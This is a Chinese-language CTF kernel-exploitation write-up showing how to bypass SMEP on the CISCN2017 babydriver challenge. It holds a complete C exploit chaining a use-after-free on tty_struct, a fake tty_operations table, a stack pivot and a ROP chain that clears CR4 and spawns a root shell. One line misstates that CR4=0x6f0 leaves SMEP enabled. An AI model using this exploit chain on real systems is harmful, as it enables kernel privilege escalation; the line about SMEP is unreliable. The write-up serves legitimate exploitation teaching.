简介
smep的全称是Supervisor Mode Execution Protection,它是内核的一种保护机制,作用是当CPU处于ring0模式的时候,如果执行了用户空间的代码就会触发页错误,很明现这个保护机制就是为了防止ret2usr攻击的…
这里为了演示如何绕过这个保护机制,我仍然使用的是CISCN2017 babydriver,这道题基本分析和利用UAF的方法原理我已经在kernel pwn–UAF这篇文章中做了解释,在这里就不再阐述了,环境也是放在github上面的,需要的可以自行下载学习…
前置知识
ptmx && tty_struct && tty_operations
ptmx设备是tty设备的一种,open函数被tty核心调用, 当一个用户对这个tty驱动被分配的设备节点调用open时tty核心使用一个指向分配给这个设备的tty_struct结构的指针调用它,也就是说我们在调用了open函数了之后会创建一个tty_struct结构体,然而最关键的是这个tty_struct也是通过kmalloc申请出来的一个堆空间,下面是关于tty_struct结构体申请的一部分源码:
struct tty_struct *alloc_tty_struct(struct tty_driver *driver, int idx)
{
struct tty_struct *tty;
tty = kzalloc(sizeof(*tty), GFP_KERNEL);
if (!tty)
return NULL;
kref_init(&tty->kref);
tty->magic = TTY_MAGIC;
tty_ldisc_init(tty);
tty->session = NULL;
tty->pgrp = NULL;
mutex_init(&tty->legacy_mutex);
mutex_init(&tty->throttle_mutex);
init_rwsem(&tty->termios_rwsem);
mutex_init(&tty->winsize_mutex);
init_ldsem(&tty->ldisc_sem);
init_waitqueue_head(&tty->write_wait);
init_waitqueue_head(&tty->read_wait);
INIT_WORK(&tty->hangup_work, do_tty_hangup);
mutex_init(&tty->atomic_write_lock);
spin_lock_init(&tty->ctrl_lock);
spin_lock_init(&tty->flow_lock);
INIT_LIST_HEAD(&tty->tty_files);
INIT_WORK(&tty->SAK_work, do_SAK_work);
tty->driver = driver;
tty->ops = driver->ops;
tty->index = idx;
tty_line_name(driver, idx, tty->name);
tty->dev = tty_get_device(tty);
return tty;
}
其中kzalloc:
static inline void *kzalloc(size_t size, gfp_t flags)
{
return kmalloc(size, flags | __GFP_ZERO);
}
而正是这个kmalloc的原因,根据前面介绍的slub分配机制,我们这里仍然可以利用UAF漏洞去修改这个结构体…
这个tty_struct结构体的大小是0x2e0,源码如下:
struct tty_struct {
int magic;
struct kref kref;
struct device *dev;
struct tty_driver *driver;
const struct tty_operations *ops; // tty_operations结构体
int index;
/* Protects ldisc changes: Lock tty not pty */
struct ld_semaphore ldisc_sem;
struct tty_ldisc *ldisc;
struct mutex atomic_write_lock;
struct mutex legacy_mutex;
struct mutex throttle_mutex;
struct rw_semaphore termios_rwsem;
struct mutex winsize_mutex;
spinlock_t ctrl_lock;
spinlock_t flow_lock;
/* Termios values are protected by the termios rwsem */
struct ktermios termios, termios_locked;
struct termiox *termiox; /* May be NULL for unsupported */
char name[64];
struct pid *pgrp; /* Protected by ctrl lock */
struct pid *session;
unsigned long flags;
int count;
struct winsize winsize; /* winsize_mutex */
unsigned long stopped:1, /* flow_lock */
flow_stopped:1,
unused:BITS_PER_LONG - 2;
int hw_stopped;
unsigned long ctrl_status:8, /* ctrl_lock */
packet:1,
unused_ctrl:BITS_PER_LONG - 9;
unsigned int receive_room; /* Bytes free for queue */
int flow_change;
struct tty_struct *link;
struct fasync_struct *fasync;
wait_queue_head_t write_wait;
wait_queue_head_t read_wait;
struct work_struct hangup_work;
void *disc_data;
void *driver_data;
spinlock_t files_lock; /* protects tty_files list */
struct list_head tty_files;
#define N_TTY_BUF_SIZE 4096
int closing;
unsigned char *write_buf;
int write_cnt;
/* If the tty has a pending do_SAK, queue it here - akpm */
struct work_struct SAK_work;
struct tty_port *port;
} __randomize_layout;
而在tty_struct结构体中有一个非常棒的结构体tty_operations,其源码如下:
struct tty_operations {
struct tty_struct * (*lookup)(struct tty_driver *driver,
struct file *filp, int idx);
int (*install)(struct tty_driver *driver, struct tty_struct *tty);
void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
int (*open)(struct tty_struct * tty, struct file * filp);
void (*close)(struct tty_struct * tty, struct file * filp);
void (*shutdown)(struct tty_struct *tty);
void (*cleanup)(struct tty_struct *tty);
int (*write)(struct tty_struct * tty,
const unsigned char *buf, int count);
int (*put_char)(struct tty_struct *tty, unsigned char ch);
void (*flush_chars)(struct tty_struct *tty);
int (*write_room)(struct tty_struct *tty);
int (*chars_in_buffer)(struct tty_struct *tty);
int (*ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
long (*compat_ioctl)(struct tty_struct *tty,
unsigned int cmd, unsigned long arg);
void (*set_termios)(struct tty_struct *tty, struct ktermios * old);
void (*throttle)(struct tty_struct * tty);
void (*unthrottle)(struct tty_struct * tty);
void (*stop)(struct tty_struct *tty);
void (*start)(struct tty_struct *tty);
void (*hangup)(struct tty_struct *tty);
int (*break_ctl)(struct tty_struct *tty, int state);
void (*flush_buffer)(struct tty_struct *tty);
void (*set_ldisc)(struct tty_struct *tty);
void (*wait_until_sent)(struct tty_struct *tty, int timeout);
void (*send_xchar)(struct tty_struct *tty, char ch);
int (*tiocmget)(struct tty_struct *tty);
int (*tiocmset)(struct tty_struct *tty,
unsigned int set, unsigned int clear);
int (*resize)(struct tty_struct *tty, struct winsize *ws);
int (*set_termiox)(struct tty_struct *tty, struct termiox *tnew);
int (*get_icount)(struct tty_struct *tty,
struct serial_icounter_struct *icount);
void (*show_fdinfo)(struct tty_struct *tty, struct seq_file *m);
#ifdef CONFIG_CONSOLE_POLL
int (*poll_init)(struct tty_driver *driver, int line, char *options);
int (*poll_get_char)(struct tty_driver *driver, int line);
void (*poll_put_char)(struct tty_driver *driver, int line, char ch);
#endif
int (*proc_show)(struct seq_file *, void *);
} __randomize_layout;
可以看到这个里面全是我们最喜欢的函数指针…
当我们往上面所open的文件中进行write操作就会调用其中相对应的int (*write)(struct tty_struct * tty,const unsigned char *buf, int count);函数…
Smep
现在我们来说一下系统是怎么知道这个Smep保护机制是开启的还是关闭的…
在系统当中有一个CR4寄存器,它的值判断是否开启smep保护的关键,当CR4寄存器的第20位是1的时候,保护开启;是0到时候,保护关闭:
举一个例子:
当CR4的值为0x1407f0的时候,smep保护开启:
$CR4 = 0x1407f0 = 0b0001 0100 0000 0111 1111 0000
当CR4的值为0x6f0的时候,smep保护开启:
$CR4 = 0x6f0 = 0b0000 0000 0000 0110 1111 0000
但是该寄存器的值无法通过gdb直接查看,只能通过kernel crash时产生的信息查看,不过我们仍然是可以通过mov指令去修改这个寄存器的值的:
mov cr4,0x6f0
思路
因为此题没有开kaslr保护,所以简化了我们一些步骤,但是在此方法中是我们前面的UAF,ROP和ret2usr的综合利用,下面是基本思路:
- 利用UAF漏洞,去控制利用
tty_struct结构体的空间,修改真实的tty_operations的地址到我们构造的tty_operations; - 构造一个tty_operations,修改其中的write函数为我们的rop;
- 利用修改的write函数来劫持程序流;
但是其中需要解决的一个问题是,我们并没有控制到栈,所以在rop的时候需要想办法进行栈转移:
不过我们可以通过调试来想想办法,先把tty_operations的内容替换为这个样子:
for(i = 0; i < 30; i++)
{
fake_tty_opera[i] = 0xffffffffffffff00 + i;
}
fake_tty_opera[7] = 0xffffffffc0000130; //babyread_addr
我们先把tty_operations[7]的位置替换为babyread的地址,然后我们通过调试发现,rax寄存器的值就是我们tty_operations结构体的首地址:
然后我们可以通过栈回溯,重新在调用tty_operations[7]的位置下断点看看:
可以清楚的看到程序的执行流程了,所以我们的就可以在这里进行栈转移操作了,利用这些指令就可以帮我们转移栈了:
mov rsp,rax
xchg rsp,rax
所以最终tty_operations的构造如下:
for(i = 0; i < 30; i++)
{
fake_tty_opera[i] = 0xffffffff8181bfc5;
}
fake_tty_opera[0] = 0xffffffff810635f5; //pop rax; pop rbp; ret;
fake_tty_opera[1] = (size_t)rop; //rop链的地址
fake_tty_opera[3] = 0xffffffff8181bfC5; // mov rsp,rax ; dec ebx ; ret
fake_tty_opera[7] = 0xffffffff8181bfc5; // mov rsp,rax ; dec ebx ; ret
为了方便理解,我们把提权,关闭smep等操作都放到rop链里面:
int i = 0;
size_t rop[20]={0};
rop[i++] = 0xffffffff810d238d; //pop_rdi_ret
rop[i++] = 0x6f0;
rop[i++] = 0xffffffff81004d80; //mov_cr4_rdi_pop_rbp_ret
rop[i++] = 0x6161616161; //junk
rop[i++] = (size_t)get_root;
rop[i++] = 0xffffffff81063694; //swapgs_pop_rbp_ret
rop[i++] = 0x6161616161;
rop[i++] = 0xffffffff814e35ef; // iretq; ret;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_eflags;
rop[i++] = user_sp;
rop[i++] = user_ss;
其实这个rop链就是比我们的之前的ret2usr多了一个mov_cr4_rdi_pop_rbp_ret…
EXP
poc.c:
#include<stdio.h>
#include<unistd.h>
#include<fcntl.h>
unsigned long user_cs, user_ss, user_eflags,user_sp;
size_t commit_creds_addr = 0xffffffff810a1420;
size_t prepare_kernel_cred_addr = 0xffffffff810a1810;
void* fake_tty_opera[30];
void shell(){
system("/bin/sh");
}
void save_stats(){
asm(
"movq %%cs, %0\n"
"movq %%ss, %1\n"
"movq %%rsp, %3\n"
"pushfq\n"
"popq %2\n"
:"=r"(user_cs), "=r"(user_ss), "=r"(user_eflags),"=r"(user_sp)
:
: "memory"
);
}
void get_root(){
char* (*pkc)(int) = prepare_kernel_cred_addr;
void (*cc)(char*) = commit_creds_addr;
(*cc)((*pkc)(0));
}
int main(){
int fd1,fd2,fd3,i=0;
size_t fake_tty_struct[4] = {0};
size_t rop[20]={0};
save_stats();
rop[i++] = 0xffffffff810d238d; //pop_rdi_ret
rop[i++] = 0x6f0;
rop[i++] = 0xffffffff81004d80; //mov_cr4_rdi_pop_rbp_ret
rop[i++] = 0x6161616161;
rop[i++] = (size_t)get_root;
rop[i++] = 0xffffffff81063694; //swapgs_pop_rbp_ret
rop[i++] = 0x6161616161;
rop[i++] = 0xffffffff814e35ef; // iretq; ret;
rop[i++] = (size_t)shell;
rop[i++] = user_cs;
rop[i++] = user_eflags;
rop[i++] = user_sp;
rop[i++] = user_ss;
for(i = 0; i < 30; i++)
{
fake_tty_opera[i] = 0xffffffff8181bfc5;
}
fake_tty_opera[0] = 0xffffffff810635f5; //pop rax; pop rbp; ret;
fake_tty_opera[1] = (size_t)rop;
fake_tty_opera[3] = 0xffffffff8181bfC5; // mov rsp,rax ; dec ebx ; ret
fake_tty_opera[7] = 0xffffffff8181bfc5;
fd1 = open("/dev/babydev",O_RDWR);
fd2 = open("/dev/babydev",O_RDWR);
ioctl(fd1,0x10001,0x2e0);
close(fd1);
fd3 = open("/dev/ptmx",O_RDWR|O_NOCTTY);
read(fd2, fake_tty_struct, 32);
fake_tty_struct[3] = (size_t)fake_tty_opera;
write(fd2,fake_tty_struct, 32);
write(fd3,"cc-sir",6); //触发rop
return 0;
}
编译:
gcc poc.c -o poc -w -static
运行:
总结
这道题其实最关键的是要熟悉内核的执行流程,了解一些关键的结构体以及他们的分配方式;
最后这里说一下找mov_cr4_rdi_pop_rbp_ret等这些gadget的小技巧,如果使用ropper或ROPgadget工具太慢的时候,可以先试试用objdump去找看能不能找到:
objdump -d vmlinux -M intel | grep -E "cr4|pop|ret"
objdump -d vmlinux -M intel | grep -E "swapgs|pop|ret"
但是使用这个方法的时候要注意看这些指令的地址是不是连续的,可不可以用;用这个方法不一定可以找到iretq,还是需要用ropper工具去找,但是大多数情况应该都可以找到的:
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